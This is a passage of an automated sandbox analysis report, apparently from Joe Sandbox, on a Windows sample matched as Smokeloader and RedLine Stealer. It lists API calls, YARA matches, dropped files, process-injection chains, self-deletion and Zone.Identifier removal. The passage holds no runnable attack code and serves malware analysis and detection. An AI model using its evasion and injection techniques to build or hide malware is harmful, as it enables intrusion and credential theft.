                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0041600522_2_00416005
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004138E422_2_004138E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004180FC22_2_004180FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004388FE22_2_004388FE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004110B822_2_004110B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0044514F22_2_0044514F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0042293A22_2_0042293A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004539C422_2_004539C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0041599922_2_00415999
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040C1B222_2_0040C1B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0043F27022_2_0043F270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0043BA1522_2_0043BA15
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00442A3422_2_00442A34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0045AACE22_2_0045AACE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004142CE22_2_004142CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0041429722_2_00414297
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00416AB922_2_00416AB9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0042EB6122_2_0042EB61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0045CB7022_2_0045CB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004193A522_2_004193A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00418BB322_2_00418BB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00419C2122_2_00419C21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00420CCC22_2_00420CCC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0044D4D022_2_0044D4D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0041AD7122_2_0041AD71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00445D1322_2_00445D13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040B52822_2_0040B528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00461E5822_2_00461E58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0044DE2B22_2_0044DE2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0041FE3222_2_0041FE32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004436F422_2_004436F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0043C73722_2_0043C737
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0042DFE822_2_0042DFE8
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 21.0.6E11.exe.890000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
                Source: 0000000F.00000002.950991871.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.900656340.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.900683183.0000000002361000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000F.00000002.951015355.0000000002531000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.900699694.00000000023B7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.900666807.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000F.00000002.951037651.00000000025C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000000F.00000002.951003696.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Temp\6E11.exe, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: String function: 6F1090D8 appears 32 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0043EB30 appears 51 times
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004012AB NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004012AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401501 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401501
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401406 NtAllocateVirtualMemory,0_2_00401406
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401413 NtAllocateVirtualMemory,0_2_00401413
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401528 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401528
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040153C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040153C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026CB NtClose,0_2_004026CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014D8 NtAllocateVirtualMemory,0_2_004014D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004012DC NtAllocateVirtualMemory,0_2_004012DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004012EC NtAllocateVirtualMemory,0_2_004012EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014F4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013FB NtAllocateVirtualMemory,0_2_004013FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402698 NtClose,0_2_00402698
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004012AA NtAllocateVirtualMemory,0_2_004012AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004012B4 NtAllocateVirtualMemory,0_2_004012B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013BA NtAllocateVirtualMemory,0_2_004013BA
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_004012AB NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_004012AB
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_00401501 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_00401501
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_00401406 NtAllocateVirtualMemory,15_2_00401406
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_00401413 NtAllocateVirtualMemory,15_2_00401413
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_00401528 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_00401528
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_0040153C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_0040153C
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_004026CB NtClose,15_2_004026CB
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_004014D8 NtAllocateVirtualMemory,15_2_004014D8
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_004012DC NtAllocateVirtualMemory,15_2_004012DC
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_004012EC NtAllocateVirtualMemory,15_2_004012EC
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_004014F4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_004014F4
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_004013FB NtAllocateVirtualMemory,15_2_004013FB
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_00402698 NtClose,15_2_00402698
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_004012AA NtAllocateVirtualMemory,15_2_004012AA
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_004012B4 NtAllocateVirtualMemory,15_2_004012B4
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_004013BA NtAllocateVirtualMemory,15_2_004013BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040EB6B lstrcmpW,NtCreateFile,lstrlenW,lstrcatW,lstrcmpW,NtQueryDirectoryFile,lstrlenW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,lstrlenW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,22_2_0040EB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040E568 NtReadFile,22_2_0040E568
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040D60C lstrcatW,lstrcatW,lstrcatW,lstrlenW,NtCreateFile,lstrlenW,22_2_0040D60C
                Source: file.exe, 00000000.00000002.900613863.0000000002284000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBujingle.exe2 vs file.exe
                Source: file.exeBinary or memory string: OriginalFilenameBujingle.exe2 vs file.exe
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\aueuggsJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/11@89/12
                Source: C:\Windows\explorer.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                Source: file.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\aueuggs C:\Users\user\AppData\Roaming\aueuggs
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6E11.exe C:\Users\user\AppData\Local\Temp\6E11.exe
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EDBC.exe C:\Users\user\AppData\Local\Temp\EDBC.exe
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 136
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6E11.exe C:\Users\user\AppData\Local\Temp\6E11.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EDBC.exe C:\Users\user\AppData\Local\Temp\EDBC.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6E11.tmpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlbJump to behavior
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_025CB897 CreateToolhelp32Snapshot,Module32First,15_2_025CB897
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5064
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3912:120:WilError_01
                Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: Binary string: C:\Users\Test\Desktop\LC2\LC2_servConf\Release\LC2.pdb source: 6E11.exe, 00000015.00000002.1048413965.000000000300E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000001.00000000.900048356.00007FFA11431000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000001.00000000.900048356.00007FFA11431000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 6E11.exe, 00000015.00000002.1048474823.00000000045BA000.00000004.00000800.00020000.00000000.sdmp, 6E11.exe, 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmp, 6E11.exe, 00000015.00000002.1049278689.0000000005890000.00000004.08000000.00040000.00000000.sdmp, 6E11.exe, 00000015.00000002.1048474823.0000000003F51000.00000004.00000800.00020000.00000000.sdmp, Protect544cd51a.dll.21.dr
                Source: Binary string: communication_program_compendium.pdb source: 6E11.exe, 00000015.00000000.1046466838.0000000000892000.00000002.00000001.01000000.00000008.sdmp, 6E11.exe.1.dr
                Source: Binary string: eex.pdb source: explorer.exe, 00000001.00000000.900048356.00007FFA11431000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: C:\Users\Test\Desktop\LC2\LC2_servConf\Release\LC2.pdbu source: 6E11.exe, 00000015.00000002.1048413965.000000000300E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: 6E11.exe, 00000015.00000002.1048474823.00000000044EC000.00000004.00000800.00020000.00000000.sdmp, 6E11.exe, 00000015.00000002.1048474823.0000000004678000.00000004.00000800.00020000.00000000.sdmp, 6E11.exe, 00000015.00000002.1049278689.000000000594A000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\aueuggsUnpacked PE file: 15.2.aueuggs.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040264F push esi; iretd 0_2_00402660
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402661 push esi; iretd 0_2_0040266F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402616 push esi; iretd 0_2_00402617
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004025EF push esi; iretd 0_2_00402608
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401EA4 push esp; retf 0_2_00401EA7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409DFD push esp; iretd 0_2_00409E09
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_0040264F push esi; iretd 15_2_00402660
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_00402661 push esi; iretd 15_2_0040266F
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_00402616 push esi; iretd 15_2_00402617
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_004025EF push esi; iretd 15_2_00402608
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_00401EA4 push esp; retf 15_2_00401EA7
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_00409DFD push esp; iretd 15_2_00409E09
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_025CD62D push esi; iretd 15_2_025CD62C
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_025CD4D6 push esi; iretd 15_2_025CD62C
                Source: C:\Users\user\AppData\Roaming\aueuggsCode function: 15_2_025CD5BD push esi; iretd 15_2_025CD62C
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F10D565 push ecx; ret 21_2_6F10D578
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F10CC2B push ecx; ret 21_2_6F10CC3E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00401A78 push eax; mov dword ptr [esp], 00000000h22_2_00401A7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00466BCD push esi; ret 22_2_00466BD6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00456EE8 push ecx; ret 22_2_00456EFB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00465766 push 00000000h; ret 22_2_00465768
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0BB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,21_2_6F0BB6C0
                Source: 6E11.exe.1.drStatic PE information: 0xCFACD4F3 [Wed May 29 12:13:39 2080 UTC]
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\aueuggsJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\aueuggsJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EDBC.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6E11.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeFile created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Deletes itself after installation
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\aueuggs:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
